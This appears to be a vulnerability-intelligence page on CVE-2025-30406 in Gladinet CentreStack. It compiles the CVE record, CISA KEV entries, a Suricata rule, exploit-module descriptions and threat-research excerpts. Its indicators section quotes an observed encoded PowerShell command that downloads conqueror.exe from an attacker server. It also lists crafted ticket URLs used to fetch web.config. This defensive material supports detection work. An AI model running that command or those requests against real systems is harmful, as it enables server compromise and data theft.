CVE-2025-30406
published 2025-04-03CVE-2025-30406: Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded…
PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-04-29
Exploited in the wild
EPSS
92.73%
99.8th percentile
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution. NOTE: a CentreStack admin can manually delete the machineKey defined in portal\web.config.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gladinet | centrestack | < 16.4.10315.56368 | 16.4.10315.56368 |
Detection & IOCsextracted from sources · hover to see the quote
command"C:\Windows\System32\cmd.exe" /c powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAOQA2AC4AMQAxAC4AMgAwADcAOgA4ADAAMAAwAC8AYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQA=↗
url/storage/filesvr.dn?t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL%7C372varAu↗
url/storage/filesvr.dn?t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsukOQzFIwOzIHswJBdS7w0RY↗
url/storage/filesvr.dn?t=t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m4mxEjYeJuI6Nk:xBHQQ1c6Hzjx3OsG4T044CP5qZ9Qr↗
- →Monitor Windows Application Event Log for Event ID 1316, which captures ViewState deserialization attack payloads (base64-encoded) submitted to the CentreStack portal. ↗
- →Alert on child process creation from w3wp.exe spawning cmd.exe or powershell.exe, which indicates server-side code execution via ViewState deserialization. ↗
- →Detect HTTP GET requests to /storage/filesvr.dn with a 't' parameter containing long base64-like encrypted ticket strings — these are exploitation attempts to download web.config via the hardcoded AES key. ↗
- →Flag access tickets in /storage/filesvr.dn requests that decrypt to a timestamp in the year 9999, indicating a crafted never-expiring ticket used by attackers to persistently download web.config. ↗
- →Hunt for the file C:\programdata\CentreStac_log.txt on CentreStack servers, which attackers created to exfiltrate ipconfig /all output via the LFI vulnerability. ↗
- ·The conqueror.exe payload (SHA256: e9fa82d92d826c6a1c38165fe6bd610d3b80cd5d53ec65ac3fe94393be64b5a5) was not present on the file system for further analysis and was not found on VirusTotal at time of writing; the C2 server at 185.196.11.207:8000 was also offline, limiting further artifact recovery. ↗
- ·Attribution to the cl0p ransomware group for the December 15 incidents could not be definitively confirmed at time of reporting; Huntress flagged it as suspected based on timing of external intelligence reports. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
cisa·2025-04-08·CVSS 9.8
CVE-2025-30406 [CRITICAL] CWE-321 Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
Vulnerability: Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
Affected: Gladinet CentreStack
Gladinet CentreStack and Triofox contains a use of hard-coded cryptographic key vulnerability in the way that the application manages keys used for ViewState integrity verification. Successful exploitation allows an attacker to forge ViewState payloads for server-side deserialization, allowing for remote code execution.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf ; https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/secu
GHSA
GHSA-hgp9-3v5v-223j: Gladinet CentreStack through 16
ghsa_unreviewed·2025-04-03
CVE-2025-30406 [CRITICAL] CWE-321 GHSA-hgp9-3v5v-223j: Gladinet CentreStack through 16
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, which enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution. NOTE: the CentreStack admin can manually delete the machineKey defined in portal\web.config.
VulnCheck
Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
vulncheck·2025·CVSS 9.0
CVE-2025-30406 [CRITICAL] CWE-321 Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
Gladinet CentreStack and Triofox contains a use of hard-coded cryptographic key vulnerability in the way that the application manages keys used for ViewState integrity verification. Successful exploitation allows an attacker to forge ViewState payloads for server-side deserialization, allowing for remote code execution.
Affected: Gladinet CentreStack
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2025-triofox.pdf; https://www.cve.org/CVERecord?id=CVE-2025-30406; http
VulnCheck
CrushFTP Authentication Bypass Vulnerability
vulncheck·2025·CVSS 9.8
CVE-2025-31161 [CRITICAL] CWE-305 CrushFTP Authentication Bypass Vulnerability
CrushFTP Authentication Bypass Vulnerability
CrushFTP contains an authentication bypass vulnerability in the HTTP authorization header that allows a remote unauthenticated attacker to authenticate to any known or guessable user account (e.g., crushadmin), potentially leading to a full compromise.
Affected: CrushFTP CrushFTP
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2025-31161; https://x.com/Shadowserver/status/1906753539499520064; https://arcticwolf.com/resources/blog/cve-2025-31161/; https://outpost24.com/blog/crushftp-auth-bypas
Suricata
ET WEB_SERVER Gladinet CentreStack & Triofox Remote Code Execution via Server-side Deserialization with Hardcoded machineKey (CVE-2025-30406)
suricata·2025-04-24·CVSS 9.0
CVE-2025-30406 [CRITICAL] ET WEB_SERVER Gladinet CentreStack & Triofox Remote Code Execution via Server-side Deserialization with Hardcoded machineKey (CVE-2025-30406)
ET WEB_SERVER Gladinet CentreStack & Triofox Remote Code Execution via Server-side Deserialization with Hardcoded machineKey (CVE-2025-30406)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SERVER Gladinet CentreStack & Triofox Remote Code Execution via Server-side Deserialization with Hardcoded machineKey (CVE-2025-30406)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/portal/loginpage.aspx"; fast_pattern; http.header; content:"cmd|3a 20|"; http.request_body; content:"__LASTFOCUS|3d|"; content:"__VIEWSTATE|3d|"; pcre:"/^[^&]*?AAQAAAP(?:\x2f|\x252F){4}8BAAAAAAAAAAwCAAAA/Ri"; reference:url,github.com/W01fh4cker/CVE-2025-30406; reference:cve,2025-30406; classtype:web-application-attack; sid:2061836; rev:1; metadata:attack_target Server, tls_state TLSDec
Metasploit
Gladinet CentreStack/Triofox Path Traversal
metasploit·CVSS 7.5
CVE-2025-11371 [HIGH] Gladinet CentreStack/Triofox Path Traversal
Gladinet CentreStack/Triofox Path Traversal
This module exploits a path traversal vulnerability (CVE-2025-11371) in Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read arbitrary files from the server's file system. The vulnerability exists in the `/storage/t.dn` endpoint which does not properly sanitize the `s` parameter, allowing path traversal attacks. This can be used to read sensitive files such as Web.config which contains the machineKey used for ViewState deserialization attacks (CVE-2025-30406). Gladinet CentreStack versions up to 16.10.10408.56683 are vulnerable. Gladinet Triofox versions up to 16.10.10408.56683 are vulnerable.
Metasploit
Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization
metasploit
Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization
Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization
A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker to forge ViewState data. This can lead to unauthorized actions such as remote code execution. Both applications make use of a hardcoded machineKey in the IIS web.config file, which is responsible for securing ASP.NET ViewState data. If an attacker obtains the machineKey, they can forge ViewState payloads that pass integrity checks. This can result in ViewState deserialization attacks, potentially leading to remote code execution (RCE) on the web server. Gladinet CentreStack versions up to 16.4.10315.56368 are vulnerable (fixed in 16.4.10315.56368). Gladinet Triofox versions up to 16.4.10317.5
Nuclei
Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE
nuclei·CVSS 9.8
CVE-2025-30406 [CRITICAL] Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE
Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution.
Template:
id: CVE-2025-30406
info:
name: Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcod
Huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
blogs_huntress·2025-12-18
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
Acknowledgments: Special thanks to John Hammond for his contributions to this investigation and writ e-up.
Update #2: 12/18/25 @ 6pm ET
We’ve seen reports from other intelligence firms that note that the cl0p ransomware group is targeting internet-facing Gladinet CentreStack servers. It is still early and we can’t fully confirm if this behavior definitively stems from cl0p. However, we continue to monitor for potential Gladinet exploitation. Most recently, we observed two new incidents on December 15.
Based on the available telemetry, both of these incidents involved suspected Gladinet CentreStack exploitation.
As seen in Figure 1 below, both incidents involved the same indicators involving a PowerShell command, which was executed via w3wp.exe :
"C:\Windows\System32\cmd.exe" /c powers
Bleepingcomputer
Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks
blogs_bleepingcomputer·2025-12-11·CVSS 9.0
[CRITICAL] Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks
## Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks
## Bill Toulas
Hackers are exploiting a new, undocumented vulnerability in the implementation of the cryptographic algorithm present in Gladinet's CentreStack and Triofox products for secure remote file access and sharing.
By leveraging the security issue, the attackers can obtain hardcoded cryptographic keys and achieve remote code execution, researchers warn.
Although the new cryptographic vulnerability does not have an official identifier, Gladinet notified customers about it and advised them to update the products to the latest version, which, at the time of the communication, had been released on November 29.
The company also provided customers with a set of indicators of compromise (IoCs), indicating that
Huntress
PeerBlight Linux Backdoor Exploits React2Shell CVE-2025-55182
blogs_huntress·2025-12-09·CVSS 10.0
CVE-2025-55182 [CRITICAL] PeerBlight Linux Backdoor Exploits React2Shell CVE-2025-55182
TL;DR : Huntress is seeing threat actors exploit a vulnerability in React Server Components ( CVE-2025-55182 ) across several organizations in our customer base. Attackers have attempted to deploy cryptominer malware, a Linux backdoor we're tracking as PeerBlight, a reverse proxy tunnel we call CowTunnel, and a Go-based post-exploitation implant dubbed ZinFoq as part of their post-exploitation activity. We also observed a Kaiji botnet variant being distributed through this campaign. We recommend immediate patching due to the feasibility of exploitation.
## Background
On December 3, a critical-severity (CVSS 10.0) unauthenticated remote code execution vulnerability was publicly disclosed in React Server Components , with the React team recommending immediate upgrade. Dubbed “React2Shell”,
Bleepingcomputer
Gladinet fixes actively exploited zero-day in file-sharing software
blogs_bleepingcomputer·2025-10-16·CVSS 7.5
CVE-2025-11371 [HIGH] Gladinet fixes actively exploited zero-day in file-sharing software
## Gladinet fixes actively exploited zero-day in file-sharing software
## Bill Toulas
Gladinet has released security updates for its CentreStack business solution to address a local file inclusion vulnerability (CVE-2025-11371) that threat actors have leveraged as a zero-day since late September.
Researchers at cybersecurity platform Huntress disclosed the exploitation activity last week saying that the flaw was a bypass for mitigations Gladinet implemented for the deserialization vulnerability leading to remote code execution (RCE) identified as CVE-2025-30406.
The local file inclusion (LFI) vulnerability enabled attackers to read the Web.config file on fully patched CentreStack deployments, extract the machine key, and then use it to exploit CVE-2025-30406.
When Huntress alerted of
Huntress
Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw
blogs_huntress·2025-10-15·CVSS 7.5
[HIGH] Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw
Update #1: 10/15/25 @ 1pm ET
On October 14, Gladinet released version 16.10.10408.56683 of CentreStack, which includes a fix for the local file inclusion vulnerability outlined below. Huntress recommends that impacted organizations update to the latest build number as soon as possible.
As a patch has now been issued, we are also releasing further analysis of the vulnerability and exploitation activity, as detailed below. The below also includes parts of the original blog, published 10/9/25.
TL;DR: Huntress has discovered in-the-wild exploitation of an unauthenticated Local File Inclusion flaw ( CVE-2025-11371 ) in Gladinet CentreStack and Triofox products. As of the initial writing of this blog, a patch was not available in the latest versions of CentreStack and Triofox.
## Background
Bleepingcomputer
Hackers exploiting zero-day in Gladinet file sharing software
blogs_bleepingcomputer·2025-10-10·CVSS 7.5
CVE-2025-11371 [HIGH] Hackers exploiting zero-day in Gladinet file sharing software
## Hackers exploiting zero-day in Gladinet file sharing software
## Bill Toulas
Threat actors are exploiting a zero-day vulnerability (CVE-2025-11371) in Gladinet CentreStack and Triofox products, which allows a local attacker to access system files without authentication.
At least three companies have been targeted so far. Although a patch is not yet available, customers can apply mitigations.
CentreStack and Triofox are Gladinet's business solutions for file sharing and remote access that allow using a company's own storage as a cloud. According to the vendor, CentreStack "is used by thousands of businesses from over 49 countries."
## No fix, all versions affected
The zero-day vulnerability CVE-2025-11371 is a Local File Inclusion (LFI) flaw affecting the default installation and c
Huntress
Top Cyber Threat Trends of 2025 from Deepfakes, ClickFix, and ViewState Exploits
blogs_huntress·2025-10-02
Top Cyber Threat Trends of 2025 from Deepfakes, ClickFix, and ViewState Exploits
Cloudflare Turnstile challenges leading to MetaStealer. Deepfake meetings impersonating company executives, which trick employees into downloading malicious extensions. Exposed ASP.NET machine keys that open the door for ViewState deserialization attacks against company servers.
These are only a few snapshots of the techniques that threat actors have been relying on in 2025 so far. In our most recent Tradecraft Tuesday episode – The Craftiest Trends, Scams, and Tradecraft of 2025 (So Far) – John Hammond and Greg Linares with Huntress dove into the top types of tricky tradecraft that threat actors are using to target businesses.
## ClickFix: The attack we’ve seen everywhere
ClickFix has been around since last year. But in 2025, attackers continued to put new spins on the crafty social en
Huntress
Do Tigers Really Change Their Stripes?
blogs_huntress·2025-05-06·CVSS 9.8
[CRITICAL] Do Tigers Really Change Their Stripes?
Something we often hear within the cybersecurity community, and particularly within digital forensics and incident response (DFIR), is that “threat actors are always changing their tactics.” If you’re just responding to incidents and putting out fires, it might seem like that, but if you’re really looking into incidents and tracking indicators and threat actor tactics, techniques, and procedures (TTPs), you’re very likely going to see that without some significant external stimulus, such as significant differences in infrastructure design and tooling, there’s really no need for a threat actor to change their tactics.
Huntress analysts and researchers recently published information regarding two vulnerabilities. On 4 April 2025, the CrushFTP CVE-2025-31161 Auth Bypass and Post-Exploitation
Huntress
CVE-2025-30406 - Critical Gladinet CentreStack & Triofox Vulnerability Exploited In The Wild
blogs_huntress·2025-04-14·CVSS 9.8
[CRITICAL] CVE-2025-30406 - Critical Gladinet CentreStack & Triofox Vulnerability Exploited In The Wild
Special thanks to Craig Sweeney, Hayden Drummond, Michael Tigges, Tanner Filip, Jevon Ang, Jamie Dumas, Stephanie Fairless, and Lindsey Welch for their contributions and support for this writeup.
On Friday, 11 April 2025, the Huntress SOC received an alert from one of our own internal detectors known to catch 0-day exploitation.
Figure 1: Process Tree of the Powershell Payload Originating from the IIS Worker Process
While this is a simple detection to see suspicious outbound connections from an irregular child process, it indicates there may be more to uncover against the software served by the web service worker.
In this case, the suspect software was Gladinet CentreStack, which was just recently added to CISA’s Known Exploited Vulnerabilities database with CVE-2025-30406. At the time
Bleepingcomputer
CentreStack RCE exploited as zero-day to breach file sharing servers
blogs_bleepingcomputer·2025-04-09·CVSS 9.0
[CRITICAL] CentreStack RCE exploited as zero-day to breach file sharing servers
## CentreStack RCE exploited as zero-day to breach file sharing servers
## Bill Toulas
Hackers exploited a vulnerability in Gladinet CentreStack's secure file-sharing software as a zero-day since March to breach storage servers
Gladinet CentreStack is an enterprise file-sharing and access platform that turns on-premise file servers (like Windows servers with SMB shares) into secure, cloud-like file systems supporting remote access to internal file shares, file syncing and sharing, multi-tenant deployments, and integration with Active Directory.
The company claims the product is used by thousands of businesses across 49 countries, including enterprises with Windows-based file servers, MSPs hosting file services for multiple clients, and various organizations that need cloud-like access
Huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability | Huntress
blogs_huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability | Huntress
Acknowledgments: Special thanks to John Hammond for his contributions to this investigation and write-up.
Update #2: 12/18/25 @ 6pm ET
We’ve seen reports from other intelligence firms that note that the cl0p ransomware group is targeting internet-facing Gladinet CentreStack servers. It is still early and we can’t fully confirm if this behavior definitively stems from cl0p. However, we continue to monitor for potential Gladinet exploitation. Most recently, we observed two new incidents on December 15.
Based on the available telemetry, both of these incidents involved suspected Gladinet CentreStack exploitation.
As seen in Figure 1 below, both incidents involved the same indicators involving a PowerShell command, which was executed via w3wp.exe:
"C:\Windows\System32\cmd.exe" /c powershe
Huntress
PeerBlight Linux Backdoor Exploits React2Shell CVE-2025-55182 | Huntress
blogs_huntress·CVSS 10.0
CVE-2025-55182 [CRITICAL] PeerBlight Linux Backdoor Exploits React2Shell CVE-2025-55182 | Huntress
TL;DR: Huntress is seeing threat actors exploit a vulnerability in React Server Components (CVE-2025-55182) across several organizations in our customer base. Attackers have attempted to deploy cryptominer malware, a Linux backdoor we're tracking as PeerBlight, a reverse proxy tunnel we call CowTunnel, and a Go-based post-exploitation implant dubbed ZinFoq as part of their post-exploitation activity. We also observed a Kaiji botnet variant being distributed through this campaign. We recommend immediate patching due to the feasibility of exploitation.
## Background
On December 3, a critical-severity (CVSS 10.0) unauthenticated remote code execution vulnerability was publicly disclosed in React Server Components, with the React team recommending immediate upgrade. Dubbed “React2Shell”, CVE
Huntress
Top Cyber Threat Trends of 2025 from Deepfakes, ClickFix, and ViewState Exploits | Huntress
blogs_huntress
Top Cyber Threat Trends of 2025 from Deepfakes, ClickFix, and ViewState Exploits | Huntress
Cloudflare Turnstile challenges leading to MetaStealer. Deepfake meetings impersonating company executives, which trick employees into downloading malicious extensions. Exposed ASP.NET machine keys that open the door for ViewState deserialization attacks against company servers.
These are only a few snapshots of the techniques that threat actors have been relying on in 2025 so far. In our most recent Tradecraft Tuesday episode – The Craftiest Trends, Scams, and Tradecraft of 2025 (So Far) – John Hammond and Greg Linares with Huntress dove into the top types of tricky tradecraft that threat actors are using to target businesses.
## ClickFix: The attack we’ve seen everywhere
ClickFix has been around since last year. But in 2025, attackers continued to put new spins on the crafty social en
Wiz
CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-14611 [HIGH] CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14611 :
Gladinet CentreStack vulnerability analysis and mitigation
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.
Source : NVD
## 7.1
Score
Published December 12, 2025
Severity HIGH
CNA Score 7.1
Affected Technologies
Gladinet CentreStack
Has Public Exploit Yes
Has CISA KEV Exploit Yes
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Pe
Huntress
CVE-2025-30406 - Critical Gladinet CentreStack & Triofox Vulnerability Exploited In The Wild | Huntress
blogs_huntress·CVSS 9.8
[CRITICAL] CVE-2025-30406 - Critical Gladinet CentreStack & Triofox Vulnerability Exploited In The Wild | Huntress
Special thanks to Craig Sweeney, Hayden Drummond, Michael Tigges, Tanner Filip, Jevon Ang, Jamie Dumas, Stephanie Fairless, and Lindsey Welch for their contributions and support for this writeup.
On Friday, 11 April 2025, the Huntress SOC received an alert from one of our own internal detectors known to catch 0-day exploitation.
Figure 1: Process Tree of the Powershell Payload Originating from the IIS Worker Process
While this is a simple detection to see suspicious outbound connections from an irregular child process, it indicates there may be more to uncover against the software served by the web service worker.
In this case, the suspect software was Gladinet CentreStack, which was just recently added to CISA’s Known Exploited Vulnerabilities database with CVE-2025-30406. At the time
Huntress
Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw | Huntress
blogs_huntress·CVSS 7.5
[HIGH] Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw | Huntress
Update #1: 10/15/25 @ 1pm ET
On October 14, Gladinet released version 16.10.10408.56683 of CentreStack, which includes a fix for the local file inclusion vulnerability outlined below. Huntress recommends that impacted organizations update to the latest build number as soon as possible.
As a patch has now been issued, we are also releasing further analysis of the vulnerability and exploitation activity, as detailed below. The below also includes parts of the original blog, published 10/9/25.
TL;DR: Huntress has discovered in-the-wild exploitation of an unauthenticated Local File Inclusion flaw (CVE-2025-11371) in Gladinet CentreStack and Triofox products. As of the initial writing of this blog, a patch was not available in the latest versions of CentreStack and Triofox.
## Background
Greynoiseio
NoiseLetter April 2025
blogs_greynoiseio
NoiseLetter April 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Huntress
Do Tigers Really Change Their Stripes? | Huntress
blogs_huntress·CVSS 9.8
[CRITICAL] Do Tigers Really Change Their Stripes? | Huntress
Something we often hear within the cybersecurity community, and particularly within digital forensics and incident response (DFIR), is that “threat actors are always changing their tactics.” If you’re just responding to incidents and putting out fires, it might seem like that, but if you’re really looking into incidents and tracking indicators and threat actor tactics, techniques, and procedures (TTPs), you’re very likely going to see that without some significant external stimulus, such as significant differences in infrastructure design and tooling, there’s really no need for a threat actor to change their tactics.
Huntress analysts and researchers recently published information regarding two vulnerabilities. On 4 April 2025, the CrushFTP CVE-2025-31161 Auth Bypass and Post-Exploitation
Recorded Future
October 2025 CVE Landscape
blogs_recorded_future·CVSS 9.8
[CRITICAL] October 2025 CVE Landscape
# October 2025 CVE Landscape: 32 High-Impact Vulnerabilities Demand Immediate Attention
October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities, double the 16 identified in September's CVE report. Twenty-six of these vulnerabilities scored as Very Critical.
What security teams need to know:
- Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw (CVE-2025-59287) now being actively exploited
- CL0P ransomware group exploited an Oracle E-Business Suite zero-day (CVE-2025-61882) for data theft and extortion campaigns
- Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlighting c
Recorded Future
October 2025 CVE Landscape
blogs_recorded_future·CVSS 9.8
[CRITICAL] October 2025 CVE Landscape
## October 2025 CVE Landscape: 32 High-Impact Vulnerabilities Demand Immediate Attention
October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities , double the 16 identified in September's CVE report . Twenty-six of these vulnerabilities scored as Very Critical.
What security teams need to know:
Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw ( CVE-2025-59287 ) now being actively exploited
CL0P ransomware group exploited an Oracle E-Business Suite zero-day ( CVE-2025-61882 ) for data theft and extortion campaigns
Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlightin
2025-04-03
Published
2025-04-08
Added to CISA KEV
Exploited in the wild